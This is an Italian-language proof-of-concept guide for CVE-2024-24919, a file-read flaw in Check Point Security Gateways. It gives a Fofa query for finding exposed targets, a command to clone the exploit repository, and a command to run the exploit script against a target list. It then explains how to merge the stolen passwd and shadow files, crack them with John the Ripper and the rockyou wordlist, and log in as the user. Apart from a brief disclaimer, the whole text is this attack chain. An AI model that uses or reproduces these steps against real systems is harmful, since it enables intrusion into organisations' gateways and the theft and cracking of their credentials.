
POC - CVE-2024–24919 - Check Point Security Gateways
Potenzialmente consente a un attaccante di leggere determinate informazioni sui Check Point Security Gateways, se connessi a Internet e con Remote Access VPN o Mobile Access Software Blades abilitati. È disponibile una correzione di sicurezza che mitiga questa vulnerabilità.
Leggi qui — CVE-2024-24919
Disclaimer: Questa Proof of Concept (POC) è realizzata solo per scopi educativi e di test etici. L'uso di questo strumento per attaccare obiettivi senza previo consenso reciproco è illegale. È responsabilità dell'utente finale rispettare tutte le leggi locali, statali e federali applicabili. Gli sviluppatori non si assumono alcuna responsabilità e non sono responsabili per eventuali usi impropri o danni causati da questo programma.
Per trovare potenziali target, usa Fofa (simile a Shodan.io):
app=”Check_Point-SSL-Network-Extender”
Per prima cosa, clona il repository:
git clone https://github.com/verylazytech/CVE-2024-24919
Successivamente scegli il tuo target e aggiungilo al file list.txt in questo formato:
Esegui l'exploit:
python3 CVE-2024-24919.py -l list.txt
Ora ci sono 2 possibili risultati:
Non riuscito:

Riuscito:

Ora, dopo aver trovato i file passwd e shadow, puoi provare a craccare l'hash con JohnTheRipper; dopo aver eseguito l'exploit hai 2 file, passwd e shadow, quindi puoi unirli in un unico file e provare a craccarli (io ho usato rockyou.txt, ma può essere qualsiasi wordlist di password):
unshadow passwd shadow > unshadowed.txt
john --wordlist=/usr/share/wordlists/rockyou.txt unshadowed.txt

E ora che abbiamo craccato l'hash, possiamo accedere come utente!